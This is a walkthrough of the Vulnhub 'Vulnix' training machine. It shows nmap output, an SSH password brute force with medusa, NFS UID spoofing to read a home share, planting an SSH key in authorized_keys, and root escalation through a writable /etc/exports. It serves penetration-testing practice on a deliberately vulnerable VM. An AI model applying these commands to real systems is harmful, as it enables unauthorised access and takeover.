Hacklab Vulnix, Vulnhub Machine Walkthrough

Today we are working on the Vulnix machine from Vulnhub.

Lets find the IP first.

nmap -sN 192.168.18.92/24

We got the IP, 192.168.18.93

Lets do a detailed scan now.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 04:47 EDT

Nmap scan report for 192.168.18.93
Host is up (0.0050s latency).
Not shown: 65518 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 
25/tcp    open  smtp       Postfix smtpd
 
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| 
|_sslv2-drown: 
79/tcp    open  finger     Linux fingerd
|
110/tcp   open  pop3       Dovecot pop3d
|_
|  
|_sslv2-drown: 
111/tcp   open  rpcbind    2-4 (RPC #100000)
|
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33365/udp6  mountd
|   100005  1,2,3      47947/tcp6  mountd
|   100005  1,2,3      56458/udp   mountd
|   100005  1,2,3      57756/tcp   mountd
|   100021  1,3,4      39547/udp   nlockmgr
|   100021  1,3,4      47952/tcp6  nlockmgr
|   100021  1,3,4      53508/udp6  nlockmgr
|   100021  1,3,4      53795/tcp   nlockmgr
|   100024  1          38357/udp   status
|   100024  1          39369/tcp   status
|   100024  1          48082/udp6  status
|   100024  1          57952/tcp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
143/tcp   open  imap       Dovecot imapd
|_
512/tcp   open  exec       netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  tcpwrapped
|
993/tcp   open  ssl/imaps?
|_

995/tcp   open  ssl/pop3s?

2049/tcp  open  nfs_acl    2-3 (RPC #100227)

39369/tcp open  status     1 (RPC #100024)
 
42985/tcp open  mountd     1-3 (RPC #100005)
 
48267/tcp open  mountd     1-3 (RPC #100005)
 
53795/tcp open  nlockmgr   1-4 (RPC #100021)
 
57756/tcp open  mountd     1-3 (RPC #100005)
 
MAC Address: 08:00:27:67:74:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.97 ms 192.168.18.93

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.55 seconds

finger is running on port 79. Lets do some user enumeration first.

We got a few users.

Lets try bruteforcing the logins.

make a text file with usernames.

Lets run medusa with rockyou.txt

medusa -h 192.168.18.93 -U vulnix_users.txt -P rockyou.txt -e ns -f -M ssh > medusa.txt

Let’s try to enumerate further when the brute forcing is going on in the background.

From the detailed scan above, we can see thet NFS is running on port 2049. Lets go deeper.

nmap -sV --script=nfs-* 192.168.18.93

We have an NFS share at /home/vulnix. Lets try to mont it to our machine.

But, we dont have permission to open it.

Lets go back to our medusa and check the results.

So, the password for user is letmein.

Lets try to login to the machine.

Lets now check the /etc/passwd file and get details for vulnix user.

If we add this user to our system with same uid as 2008, we can read the mounted directory. Right? Lets try.

useradd -u 2008 vulnix
su vulnix
cd /tmp/vulnix
ls -la

We got access to vulnix’s home folder.

If we place our id_rsa.pub key in /mnt/vulnix/.ssh/authorized_keys we can login without passsword.

Create a key, if you have not created yet.

ssh-keygen -t rsa

Now add the public key to /tmp. and change the owner to vulnix.

add the file to /mnt/vulnix/.ssh/authorized_keys

Now we can login as vulnix on the target machine without password.

Lets see what can we do with this user.

sudo -l

We can edit the /etc/exports file as root without password.

According to this article, https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ , the *(rw,root_squash) is used to prevent file access as root. Since we have edit acces to this file. we can change that.

Made the change and saved.

We need to restart NFS to bring our change into action, since we dont have root access, lets restart the machine.

Now remount the share and copy our /bin/bash to the mounted directory.

root@kali:/mnt/vulnix# cp /bin/bash .

The file is present in the home folder of vulnix, with owner as root. Lets try to run that.

./bash
whoami
root

So we got the root access in Vulnix too. Next day next Machine!